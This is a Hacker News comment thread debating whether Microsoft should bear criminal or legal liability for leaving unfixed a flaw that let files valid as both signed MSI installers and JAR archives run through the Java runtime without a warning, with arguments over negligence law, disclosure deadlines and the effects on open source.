Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

What about criminal liability? I know that it's highly unlikely that Microsoft will ever get what it truly deserves (at least as long as the USA remains what it is), but still.

I find it rather telling, how many argue that Microsoft is (obviously) wrong in their behavior, yet I don't read much about how the company deserves severe punishment (maybe even forced break-up or having control taken away from it altogether), for knowingly not fixing a security fuck-up like this, for this long. Maybe an interesting case for anthropologists one day, to study social/cultural conditioning.

I'm sure that Microsoft will have it's reasons and considerations, but that should not excuse or exclude them from liability for the consequences of their actions. Whether that will ever succeed in court, given both the reality of what Microsoft and the USA are (many other countries too, by extension), that is another story. But it should not take rocket science to figure out that it will only get worse if Microsoft gets away with this without repercussions (again). Guess, how we got here in the first place.



How would you define criminal liability to achieve this?

You have a bug that, at best allows a third-party runtime to execute a malicious program without warning the user that the program is untrusted. Practically, how would you write a statute so that this case would be different from Windows not warning about malicious file in $arbitrary third-party file format$ that exploits bug in $arbitrary third-party software$? You don't want vendors legally responsible for the behavior of third-party code on their systems, that's how you get entirely walled-garden platforms that have no user freedom.


Laws don’t need to be that specific, that’s what the legal system is for. So instead terms like negligence are used which have very specific legal meanings, and then people consider if a Microsoft was legally negligent in their behavior. The downside is it’s more vague, but the upside is it can rapidly evolve over time as new information comes to light.

https://legal-dictionary.thefreedictionary.com/negligence


Laws don't necessarily need to be specific, but if you rely solely on interpretation to distinguish between different types of responsibility involving third-party software, you will either achieve (1) appeals courts defining responsibility as narrowly as possible, or (2) the complete destruction of third-party software and all independent software development as no vendor is willing to risk exposure.


Liability is always limited to the value of the company. Thus even in the extreme case liability would at worst force companies to run each pice of software as it’s own legal entity. Aka Microsoft is going to keep selling Windows as an OS even if they need to spin off a subsidiary.


Well, then you've still destroyed small independent software vendors, open source projects, and individual projects for which the cost and complications of running an LLC as a liability shield is unsustainable.

The issue with defining liability here is primarily what conduct should make a company liable in the first place (and doing so in a way without horrible consequences for user freedom), not what the damages can be.


How would you define criminal liability to achieve this?

Easy. If a producer of software is made aware of a defect in their software that may lead to a breach of security, they are required to either fix it in x amount of days, or publicly disclose the full details of the vulnerability so that users of the software may make an informed decison on how to proceed.

You could even say that if they disclose that there is a vulnerability along with a temporary workaround, they get an extension of time to fix it or release the details.

Edit: after reading what I wrote I think it actually should apply to all bugs, not just security related ones. Either fix it, or let everyone know about it.


In this case, the worst extent of the flaw is that Windows doesn't warn that a file used by a piece of third-party software could be dangerous. If you want a case like this to involve liability, that's what you have to include.

If a producer of software is made aware of a defect in their software that may lead to a breach of security

Now, I can guarantee you 100%, based on its track record, that a code execution and sandbox vulnerability exists right now in Adobe PDF readers. Should Windows be required warn users before opening a PDF file that it could be dangerous? What would be different for any other non-trivial software that consumes a non-trivial file format?

It is by no means a stretch to say that if Microsoft is liable in this case, they must be liable for not warning users on a whole host of other issues with third-party software.

I'm generally in favor of some kind of serious liabilities for vulnerabilities, but let's not pretend defining liability in an effective way is easy.


In this case the defect is with how Microsoft handles MSI files. It is Microsoft's problem to fix.

Now, I can guarantee you 100%, based on its track record, that a code execution and sandbox vulnerability exists right now in Adobe PDF readers. Should Windows be required warn users before opening a PDF file that it could be dangerous? What would be different for any other non-trivial software that consumes a non-trivial file format?

No, they only should only have to make a public release about their own, known defects. They shouldn't even have to notify users directly, just make it publicly known. Though it would be nice if they kept track of other vendor's defects and alerted users.


In this case the defect is with how Microsoft handles MSI files

Except, of course, that Windows is absolutely correct in validating them as a MSI file. It just happens that it fails to correctly validate a file that is both a valid MSI and a valid JAR. Windows itself is incapable of doing anything dangerous with the (to its perspective) nonsense data appended beyond the validated contents of the file.

This is essentially a TOCTOU bug involving one vendor performing the check (MS) and one vendor performing the use (whoever shipped the JRE), both of which are technically correct in the most narrowly-scoped sense but produce a significant issue when combined.


In case of Adobe PDF readers I think their point would be that Adobe should notify the users - not Windows itself. That's how I interpreted it.


Sure, one would want Adobe to be the liable party in such a case. But that case wouldn't be too different from the current one, where the problem is Windows failing to warn on a file that is otherwise harmless which becomes harmful when opened by a piece of third-party software.


I don't think it's fair to characterize this as a JRE bug. The only programs that had the opportunity to recognize that the MSI file was signed too early did not account for it. The JRE can't be expected to know that Edge and whatever thought the valid JAR it's reading was considered a MSI by the piece of software that processed it, despite being dispatched to the JRE from the explorer.


It's not a bug in the JRE, but the bug is a problem because Windows itself doesn't see the file as dangerous, while the JRE invoked on it treats it as code to execute. Windows, on its own, is not aware that the file represents executable code outside of the validated sections of the MSI.


It's absolutely a bug in the JRE that it's executable format is a) completely unsigned and b) allows crap at the start of it.

If there's a bug in Windows here, there's a bug in the JRE.


I disagree, the JRE is a virtual machine; if not for the OS, how would you protect against it? Isn’t the OS itself responsible for authorizing whether the invocation of the JRE process is authorized, rather than the virtual machine itself?

Are there any comparable virtual machines that require signed bytecode by default? I’ve personally never heard of it, most of the time it’s verified when the package is downloaded, rather than when it’s executed.


Java applets did actually have their own security model using signatures, which did not necessarily require the host OS to be part of that verification.


The JRE is a runtime for running arbitrary code, it's the whole purpose of it. If you can put something at the start of a JAR, you can put whatever you want in the JAR. Meanwhile, Windows knows that this will be run by the JRE, because when you open it from the explorer, it is associated with the JRE while the part that validates the file considers it an MSI.

Windows is basically completely responsible for this: Windows validates the MSI, windows knows what an MSI is, Windows knows it will be run by the JRE and validates it just as an MSI instead.


To be fair, all Windows knows that a program, in this case the JRE, is registered to open the file. Nothing about that necessarily means "this file will be executed", nor that that program will interpret the file differently than Windows has.


> Windows, on its own, is not aware that the file represents executable code outside of the validated sections of the MSI.

I think Windows is aware of this though, it's called JAR and explorer says the JRE should open it. Furthermore, should there be any sections in a signed MSI that aren't signed? Could that serve any legitimate purpose? No, it entirely defeats the purpose of signing it.


Allowing "unreachable" unsigned data to be appended to a MSI isn't really a threat in and of itself, since the data shouldn't be reachable from any of the valid parts of the file. I could easily see some tools appending their own metadata to the end of the file and thus actually relying on such modification not invalidating the signature.

I would not be surprised if part of the delay fixing this involved MS finding out early on that a major user of MSI files was actually relying on this (perhaps some installer creation tool or AV scanner?) and decided that the user needed to fix their product and distribute the fixed version before a Windows patch was viable.


The malware is in a Jar, a data file executed by Oracle's VM. It's a bit much to hold Microsoft liable for the behavior of 3rd part software.

I could write a program that deletes your hard drive if you run a script named delete me.jpg. should Microsoft be liable?


Microsoft is claiming to be able to tell if a file is signed, and warn if it is not. They found out 2 years ago that this functionality has a problem. If they turned around and released a report saying they know it doesn't work for jar files, then they shouldn't be liable, but they didn't do that.


There is probably something in the contract that says that Microsoft is not criminally liable. I trust their lawyers for that.

But if companies become criminally liable for bugs, this can be bad news for open source projects. For example. My company wants to use some GPL software, but we need some extra features, so following the license, I implement them and release the source. The original maintainers like it and put it into the official tree. Unfortunately, my contribution introduces a serious security flaw in some other part that my company doesn't use, we simply overlooked that part, it is our fault, but we didn't mean any harm. We may even have seen the CVE, but because it wasn't about something we used, we didn't look into it. And now, suddenly just because we did everything by the rules and released our source code, we are now criminally liable... That kind of thing makes you think twice before you contribute to any open source project...

Usually open source projects have a very big "we are not responsible for anything, to the maximum intent permitted by law" warning to avoid this kind of problem. Companies are of course free to provide additional guarantees on derived products, that's one business model for open source developers.

But if you make a law where software developers are responsible for their bugs no matter the contract, even if there is no ill intent, this is going to be a problem.


> What about criminal liability?

You are pointing at a huge elephant in the room. When it comes to software, companies have incredible leeway.

A company can develop some very popular software and earn billions while also inserting malware or simply leaving vulnerabilities unpatched without any repercussion.

It is even legal to discover vulnerabilities in your own software and sell them (anonymously) on the 0-day market.


>What about criminal liability?

What about it? "The software is provided as is", remember?


Have my upvote, but I feel as long as vendors can get away with that clause nobody should be punished for CFAA violations either:

"Provided as is" => "Used as is" ;-)


As much as I love to see it, I don't see the damage. Users have a choice these days to even download/install a free! OS. This is a clear case of vote with your wallets. There are TONs of Operating systems, why stick with Microsoft at this point?


The problem with “the market will sort itself” takes like this is that the market is not as efficient and elastic as we ideally hope. It, first of all, assumes that everyone has the ability and knowledge to pick the operating system that is best for them. Things like marketing, personally critical (but platform dependent) software (as the other child comment says), market share, and previously formed platform comfort all influence the decisions that users and developers make regarding OS. Not to mention that possibility that someone needs to use two different operating systems for two different tasks.

If everyone at once decided that they were no longer using windows, it’s not controversial that there would at least still be a massive amount of work and time to shift every legacy on windows to another platform. Even in this most extreme example of the market shifting, windows still has the security issues for the transition timeframe that the market alone can’t solve.


Can you explain why you are claiming this as a "problem"? There is no reason to think that anyone is qualified to tell others what products they should or shouldn't buy. The idea that people need to be "saved" from making wrong purchasing decisions is abhorrent.


> There is no reason to think that anyone is qualified to tell others what products they should or shouldn't buy.

What nonsense is this?! Do you maybe mean "can or can't buy"? Otherwise, I don't see how this statement can be parsed such that it isn't obviously incorrect.


There are lots of possible choices, but if you depend on software not available on other platforms, it doesn't matter. If Microsoft doesn't do their job once properly notified, they deserve a slap on the wrist.


Maybe if the exploit is actually leveraged to cause damages. Outside of that, you think they should get fined because the possibility for exploit is there?

Edit: missing clarity - I think fines are appropriate when/if damage occurs, my reply was based on if notification happens without actively being exploited.


The OP reports exploits in the wild.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: